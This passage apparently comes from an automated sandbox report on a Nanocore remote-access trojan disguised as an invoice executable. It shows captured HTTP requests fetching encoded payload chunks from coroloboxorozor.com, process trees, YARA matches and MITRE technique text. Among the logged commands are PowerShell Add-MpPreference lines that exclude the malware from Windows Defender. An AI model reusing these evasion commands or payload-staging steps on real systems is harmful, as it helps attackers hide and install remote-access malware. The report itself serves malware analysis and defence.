78 63 51 51 67 63 78 63 6c 6a 63 78 63 77 67 63 78 63 6c 6d 63 78 63 51 6d 6d 63 78 63 51 78 6a 63 78 63 4e 42 63 78 63 77 4e 63 78 63 67 77 63 78 63 51 78 4e 63 78 63 51 6d 51 63 78 63 51 78 4e 63 78 63 51 51 6a 63 78 63 4c 77 63 78 63 51 78 6c 63 78 63 4e 4c 63 78 63 77 6d 63 78 63 67 51 63 78 63 77 51 63 78 63 4e 77 63 78 63 6c 77 63 78 63 4e 6c 63 78 63 77 6c 63 78 63 51 78 78 63 78 63 4c 78 63 78 63 6c 4e 63 78 63 4e 4c 63 78 63 6c 51 63 78 63 51 78 42 63 78 63 6c 77 63 78 63 67 4e 63 78 63 51 51 4e 63 78 63 67 6a 63 78 63 77 6c 63 78 63 6a 6c 63 78 63 6c 4e 63 78 63 4e 77 63 78 63 77 6a 63 78 63 77 67 63 78 63 51 6d 6d 63 78 63 77 6d 63 78 63 67 67 63 78 63 4c 77 63 78 63 4c 78 63 78 63 51 78 6c 63 78 63 51 78 67 63 78 63 4c 6c 63 78 63 4e 6c 63 78 63 6c 78 63 78 63 77 6d 63 78 63 51 78 4c 63 78 63 77 6a 63 78 63 6c 6c 63 78 63 77 51 63 78 63 6c 4e 63 78 63 77 77 63 78 63 51 6d 6d 63 78 63 51 78 51 63 78 63 67 6d 63 78 63 51 51 78 63 78 63 51 78 4c 63 78 63 51 51 77 63 78 63 6c 77 63 78 63 51 78 42 63 78 63 51 51 4c 63 78 63 6a 67 63 Data Ascii: 52b2<p>cxclBcxcLxcxcwxcxcQQNcxclLcxcwgcxcQxgcxcwjcxcjwcxclBcxcgBcxcgQcxcQmxcxcwLcxcljcxcgBcxcwwcxcgQcxcQxwcxcQxBcxcgwcxcQxLcxcQmmcxclBcxclwcxcQxLcxcQxBcxcQxlcxcQxmcxcQxjcxcQQlcxcgQcxcgQcxcQQgcxcljcxcwgcxclmcxcQmmcxcQxjcxcNBcxcwNcxcgwcxcQxNcxcQmQcxcQxNcxcQQjcxcLwcxcQxlcxcNLcxcwmcxcgQcxcwQcxcNwcxclwcxcNlcxcwlcxcQxxcxcLxcxclNcxcNLcxclQcxcQxBcxclwcxcgNcxcQQNcxcgjcxcwlcxcjlcxclNcxcNwcxcwjcxcwgcxcQmmcxcwmcxcggcxcLwcxcLxcxcQxlcxcQxgcxcLlcxcNlcxclxcxcwmcxcQxLcxcwjcxcllcxcwQcxclNcxcwwcxcQmmcxcQxQcxcgmcxcQQxcxcQxLcxcQQwcxclwcxcQxBcxcQQLcxcjgc

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49767	104.21.71.230	80	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Timestamp	kBytes transferred	Direction	Data
Feb 22, 2021 09:14:42.288417101 CET	6603	OUT	GET /base/EE6EDC43DDDD18D0313D668388B5ECD3.html HTTP/1.1 Host: coroloboxorozor.com Connection: Keep-Alive
Feb 22, 2021 09:14:42.494074106 CET	6605	IN	HTTP/1.1 200 OK Date: Mon, 22 Feb 2021 08:14:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d3ee4a13bf46633acdca9743e1a51af9e1613981682; expires=Wed, 24-Mar-21 08:14:42 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Mon, 22 Feb 2021 03:56:11 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 086a67229700000c0134381000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YC471kQ9Yz9r4pFkf%2FRLU112GnpRem11VCl7peYy7tqKqgunfWBmQLf9leiMoLysaLV%2FalJ5YNRna6USW4W0scHsmUEO8zfS%2B%2FkDZq%2FP2QvCLI6R"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 6257414a8da90c01-AMS Data Raw: 36 63 35 38 0d 0a 3c 70 3e 77 77 63 4c 78 63 51 4e 4e 63 78 63 42 63 78 63 78 63 78 63 4e 63 78 63 78 63 78 63 6d 67 67 63 6d 67 67 63 78 63 78 63 51 6c 4e 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 6a 4e 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 51 6d 6c 63 78 63 78 63 78 63 51 4e 63 42 51 63 51 6c 6a 63 51 4e 63 78 63 51 6c 78 63 4c 63 6d 78 67 63 42 42 63 51 6c 4e 63 51 63 77 6a 63 6d 78 67 63 42 42 63 6c 4e 63 51 78 4e 63 51 78 67 63 51 51 67 63 42 6d 63 51 51 6d 63 51 51 4e 63 51 51 51 63 51 78 42 63 51 51 4e 63 4c 77 63 51 78 4c 63 42 6d 63 4c 4c 63 4c 77 63 51 51 78 63 51 51 78 63 51 51 51 63 51 51 6a 63 42 6d 63 4c 6c 63 51 78 51 63 42 6d 63 51 51 4e 63 51 51 77 63 51 51 78 63 42 6d 63 51 78 67 63 51 51 78 63 42 6d 63 6a 6c 63 77 4c 63 6c 42 63 42 6d 63 51 78 4c 63 51 51 51 63 51 78 78 63 51 78 51 63 4e 6a 63 51 42 63 51 42 63 51 78 63 42 6a 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 6c 78 63 6a 4c 63 78 63 78 63 77 6a 63 51 63 42 63 78 63 77 6a 63 51 4e 6d 63 4e 51 63 51 6c 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 6d 6d 4e 63 78 63 42 4e 63 78 63 51 51 63 51 63 6c 78 63 78 63 78 63 78 63 51 51 63 78 63 78 63 6a 63 78 63 78 63 78 63 78 63 78 63 78 63 6d 42 6c 63 42 51 63 51 51 63 78 63 78 63 42 6d 63 78 63 78 63 78 63 42 6d 63 51 51 63 78 63 78 63 78 63 78 63 51 6d 6c 63 78 63 42 6d 63 78 63 78 63 78 63 6d 63 78 63 78 63 4e 63 78 63 78 63 78 63 78 63 78 63 78 63 78 63 4e 63 78 63 78 63 78 Data Ascii: 6c58<p>wwcLxcQNNcxcBcxcxcxcNcxcxcxcmggcmggcxcxcQlNcxcxcxcxcxcxcxcjNcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcxcQmlcxcxcxcQNcBQcQljcQNcxcQlxcLcmxgcBBcQlNcQcwjcmxgcBBclNcQxNcQxgcQQgcBmcQQmcQQNcQQQcQxBcQQNcLwcQxLcBmcLLcLwcQQxcQQxcQQQcQQjcBmcLlcQxQcBmcQQNcQQwcQQxcBmcQxgcQQxcBmcjlcwLclBcBmcQxLcQQQcQxxcQxQcNjcQBcQBcQxcBjcxcxcxcxcxcxcxclxcjLcxcxcwjcQcBcxcwjcQNmcNQcQlxcxcxcxcxcxcxcxcxcmmNcxcBNcxcQQcQclxcxcxcxcQQcxcxcjcxcxcxcxcxcxcmBlcBQcQQcxcxcBmcxcxcxcBmcQQcxcxcxcxcQmlcxcBmcxcxcxcmcxcxcNcxcxcxcxcxcxcxcNcxcxcx
Feb 22, 2021 09:14:54.994440079 CET	12328	OUT	GET /base/563CB4793425B369FD0FAF05E615CF43.html HTTP/1.1 Host: coroloboxorozor.com
Feb 22, 2021 09:14:55.129362106 CET	12329	IN	HTTP/1.1 200 OK Date: Mon, 22 Feb 2021 08:14:55 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d87de4d02b35a0fd24e7608b29febf03d1613981695; expires=Wed, 24-Mar-21 08:14:55 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax last-modified: Mon, 22 Feb 2021 03:56:14 GMT vary: Accept-Encoding x-frame-options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 086a67543a00000c012a041000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=5LHt%2BzSN7mUvEuuDj24GGbmB3UvG1KT9HhPY4ogGJnJe84EMb1rjL7ymOoVPocmYIz3BfxM7W6tJGgOTB57exaOn%2FO9X%2FqsslwjTDALoQVNfyZwP"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 62574199fba30c01-AMS Data Raw: 33 32 32 36 0d 0a 3c 70 3e 6c 4e 63 6a 77 63 6d 42 63 51 4c 67 63 6d 42 6d 63 51 67 4e 63 51 6c 63 6d 51 78 63 51 4c 6c 63 4e 6d 63 4c 78 63 51 4c 77 63 77 42 63 51 67 4e 63 6d 6c 63 51 78 4c 63 6d 51 6a 63 77 78 63 6d 6d 67 63 6d 4c 63 51 51 78 63 51 6d 4e 63 67 42 63 6d 42 6a 63 51 6d 78 63 51 77 42 63 51 4e 67 63 6d 42 42 63 6c 78 63 4e 6a 63 51 6c 42 63 67 6d 63 51 78 4c 63 51 77 78 63 51 78 4e 63 6d 67 6d 63 51 4e 51 63 6c 6d 63 51 6c 77 63 6d 78 77 63 51 51 4e 63 6d 67 4e 63 51 6d 4e 63 42 6a 63 67 63 51 4e 42 63 6d 78 51 63 6a 6c 63 51 6a 51 63 6d 4e 6d 63 51 78 42 63 6d 51 6a 63 51 77 63 6d 6d 67 63 6d 51 77 63 51 51 42 63 77 42 63 51 42 6c 63 6d 78 77 63 67 6a 63 6d 42 6d 63 6d 4e 51 63 77 6d 63 51 6a 6d 63 51 42 4e 63 51 6c 77 63 51 6d 6c 63 51 4c 67 63 42 63 51 42 77 63 67 6d 63 51 4c 6d 63 51 51 77 63 51 51 6d 63 51 77 4c 63 4c 63 4c 42 63 42 6d 63 6d 51 42 63 6d 6a 63 51 77 77 63 51 77 78 63 6a 6c 63 51 77 77 63 51 78 4e 63 51 6d 77 63 6d 6d 6a 63 67 63 51 78 4c 63 67 6a 63 51 6d 42 63 51 4e 63 6d 78 6a 63 6c 78 63 6d 42 42 63 51 67 4c 63 4e 4e 63 51 6d 6c 63 6d 42 63 6d 42 6d 63 51 6a 4c 63 51 67 78 63 77 77 63 6c 4c 63 4c 6d 63 6d 78 78 63 6d 42 42 63 4c 4e 63 4e 4c 63 51 4c 4c 63 6d 78 78 63 67 78 63 67 51 63 6d 42 67 63 51 42 6a 63 42 4c 63 51 51 51 63 51 6c 6a 63 51 77 63 51 6c 42 63 51 4e 6a 63 6d 4e 63 6d 78 4c 63 51 6c 4c 63 51 4e 78 63 6d 67 63 4e 42 63 51 67 6d 63 6d 51 4c 63 6d 51 77 63 6d 4c 63 6d 42 42 63 6d 67 63 6d 4e 63 6d 4e 42 63 6d 67 6d 63 51 6a 6c 63 6c 63 6d 6c 63 6d 6a 63 51 6a 4c 63 6a 6d 63 51 6a 67 63 51 6d 63 6c 4e 63 51 6c 6d 63 6d 51 6d 63 6a 78 63 51 Data Ascii: 3226<p>lNcjwcmBcQLgcmBmcQgNcQlcmQxcQLlcNmcLxcQLwcwBcQgNcmlcQxLcmQjcwxcmmgcmLcQQxcQmNcgBcmBjcQmxcQwBcQNgcmBBclxcNjcQlBcgmcQxLcQwxcQxNcmgmcQNQclmcQlwcmxwcQQNcmgNcQmNcBjcgcQNBcmxQcjlcQjQcmNmcQxBcmQjcQwcmmgcmQwcQQBcwBcQBlcmxwcgjcmBmcmNQcwmcQjmcQBNcQlwcQmlcQLgcBcQBwcgmcQLmcQQwcQQmcQwLcLcLBcBmcmQBcmjcQwwcQwxcjlcQwwcQxNcQmwcmmjcgcQxLcgjcQmBcQNcmxjclxcmBBcQgLcNNcQmlcmBcmBmcQjLcQgxcwwclLcLmcmxxcmBBcLNcNLcQLLcmxxcgxcgQcmBgcQBjcBLcQQQcQljcQwcQlBcQNjcmNcmxLcQlLcQNxcmgcNBcQgmcmQLcmQwcmLcmBBcmgcmNcmNBcmgmcQjlclcmlcmjcQjLcjmcQjgcQmclNcQlmcmQmcjxcQ
Feb 22, 2021 09:15:09.839158058 CET	13518	OUT	GET /base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html HTTP/1.1 Host: coroloboxorozor.com
Feb 22, 2021 09:15:09.987102985 CET	13519	IN	HTTP/1.1 200 OK Date: Mon, 22 Feb 2021 08:15:09 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d96d6099f8c046104351d020795d60d371613981709; expires=Wed, 24-Mar-21 08:15:09 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax Last-Modified: Mon, 22 Feb 2021 03:56:16 GMT Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN CF-Cache-Status: DYNAMIC cf-request-id: 086a678e3600000c0179ae8000000001 Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=8EBM95%2FoUL3B4iDiNkp%2BFzrstA1Vccj%2F%2BQh2fytdlAehbIGpnxp%2BURWoL47DyBKwG4f9VGrjiL%2BhhXDA%2BPSb%2BIm%2FzyInHHxMlB4thxLlJozmaaBB"}]} NEL: {"max_age":604800,"report_to":"cf-nel"} Server: cloudflare CF-RAY: 625741f6bf180c01-AMS Data Raw: 35 32 62 32 0d 0a 3c 70 3e 63 78 63 6c 42 63 78 63 4c 78 63 78 63 77 78 63 78 63 51 51 4e 63 78 63 6c 4c 63 78 63 77 67 63 78 63 51 78 67 63 78 63 77 6a 63 78 63 6a 77 63 78 63 6c 42 63 78 63 67 42 63 78 63 67 51 63 78 63 51 6d 78 63 78 63 77 4c 63 78 63 6c 6a 63 78 63 67 42 63 78 63 77 77 63 78 63 67 51 63 78 63 51 78 77 63 78 63 51 78 42 63 78 63 67 77 63 78 63 51 78 4c 63 78 63 51 6d 6d 63 78 63 6c 42 63 78 63 6c 77 63 78 63 51 78 4c 63 78 63 51 78 42 63 78 63 51 78 6c 63 78 63 51 78 6d 63 78 63 51 78 6a 63 78 63 51 51 6c 63 78 63 67 51 63 78 63 67 51 63 78 63 51 51 67 63 78 63 6c 6a 63 78 63 77 67 63 78 63 6c 6d 63 78 63 51 6d 6d 63 78 63 51 78 6a 63 78 63 4e 42 63 78 63 77 4e 63 78 63 67 77 63 78 63 51 78 4e 63 78 63 51 6d 51 63 78 63 51 78 4e 63 78 63 51 51 6a 63 78 63 4c 77 63 78 63 51 78 6c 63 78 63 4e 4c 63 78 63 77 6d 63 78 63 67 51 63 78 63 77 51 63 78 63 4e 77 63 78 63 6c 77 63 78 63 4e 6c 63 78 63 77 6c 63 78 63 51 78 78 63 78 63 4c 78 63 78 63 6c 4e 63 78 63 4e 4c 63 78 63 6c 51 63 78 63 51 78 42 63 78 63 6c 77 63 78 63 67 4e 63 78 63 51 51 4e 63 78 63 67 6a 63 78 63 77 6c 63 78 63 6a 6c 63 78 63 6c 4e 63 78 63 4e 77 63 78 63 77 6a 63 78 63 77 67 63 78 63 51 6d 6d 63 78 63 77 6d 63 78 63 67 67 63 78 63 4c 77 63 78 63 4c 78 63 78 63 51 78 6c 63 78 63 51 78 67 63 78 63 4c 6c 63 78 63 4e 6c 63 78 63 6c 78 63 78 63 77 6d 63 78 63 51 78 4c 63 78 63 77 6a 63 78 63 6c 6c 63 78 63 77 51 63 78 63 6c 4e 63 78 63 77 77 63 78 63 51 6d 6d 63 78 63 51 78 51 63 78 63 67 6d 63 78 63 51 51 78 63 78 63 51 78 4c 63 78 63 51 51 77 63 78 63 6c 77 63 78 63 51 78 42 Data Ascii: 52b2<p>cxclBcxcLxcxcwxcxcQQNcxclLcxcwgcxcQxgcxcwjcxcjwcxclBcxcgBcxcgQcxcQmxcxcwLcxcljcxcgBcxcwwcxcgQcxcQxwcxcQxBcxcgwcxcQxLcxcQmmcxclBcxclwcxcQxLcxcQxBcxcQxlcxcQxmcxcQxjcxcQQlcxcgQcxcgQcxcQQgcxcljcxcwgcxclmcxcQmmcxcQxjcxcNBcxcwNcxcgwcxcQxNcxcQmQcxcQxNcxcQQjcxcLwcxcQxlcxcNLcxcwmcxcgQcxcwQcxcNwcxclwcxcNlcxcwlcxcQxxcxcLxcxclNcxcNLcxclQcxcQxBcxclwcxcgNcxcQQNcxcgjcxcwlcxcjlcxclNcxcNwcxcwjcxcwgcxcQmmcxcwmcxcggcxcLwcxcLxcxcQxlcxcQxgcxcLlcxcNlcxclxcxcwmcxcQxLcxcwjcxcllcxcwQcxclNcxcwwcxcQmmcxcQxQcxcgmcxcQQxcxcQxLcxcQQwcxclwcxcQxB

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164 Parent PID: 5908

General

Start time:	09:13:23
Start date:	22/02/2021
Path:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
Imagebase:	0x700000
File size:	209408 bytes
MD5 hash:	379482795DA0042D0070E6AE599A369B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Reputation:	low

Analysis Process: svchost.exe PID: 6988 Parent PID: 568

General

Start time:	09:13:33
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6292 Parent PID: 568

General

Start time:	09:13:52
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: svchost.exe PID: 6952 Parent PID: 568

General

Start time:	09:14:03
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 7088 Parent PID: 7164

General

Start time:	09:14:13
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Imagebase:	0xca0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 5844 Parent PID: 7088

General

Start time:	09:14:13
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: AdvancedRun.exe PID: 5956 Parent PID: 7164

General

Start time:	09:14:14
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: AdvancedRun.exe PID: 7092 Parent PID: 5956

General

Start time:	09:14:15
Start date:	22/02/2021
Path:	C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956
Imagebase:	0x400000
File size:	91000 bytes
MD5 hash:	17FC12902F4769AF3A9271EB4E2DACCE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: svchost.exe PID: 4984 Parent PID: 568

General

Start time:	09:14:18
Start date:	22/02/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: powershell.exe PID: 4488 Parent PID: 7164

General

Start time:	09:14:22
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Imagebase:	0xca0000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Analysis Process: conhost.exe PID: 6580 Parent PID: 4488

General

Start time:	09:14:22
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: explorer.exe PID: 6680 Parent PID: 3424

General

Start time:	09:14:23
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: cmd.exe PID: 6748 Parent PID: 7164

General

Start time:	09:14:22
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\cmd.exe' /c timeout 1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: conhost.exe PID: 6728 Parent PID: 6748

General

Start time:	09:14:23
Start date:	22/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: timeout.exe PID: 5992 Parent PID: 6748

General

Start time:	09:14:23
Start date:	22/02/2021
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout 1
Imagebase:	0xf00000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 5988 Parent PID: 800

General

Start time:	09:14:24
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 1284 Parent PID: 5988

General

Start time:	09:14:28
Start date:	22/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x440000
File size:	209408 bytes
MD5 hash:	379482795DA0042D0070E6AE599A369B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 30%, ReversingLabs

Analysis Process: explorer.exe PID: 5320 Parent PID: 3424

General

Start time:	09:14:31
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: explorer.exe PID: 5552 Parent PID: 800

General

Start time:	09:14:33
Start date:	22/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Analysis Process: svchost.exe PID: 3980 Parent PID: 5552

General

Start time:	09:14:35
Start date:	22/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Imagebase:	0x860000
File size:	209408 bytes
MD5 hash:	379482795DA0042D0070E6AE599A369B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

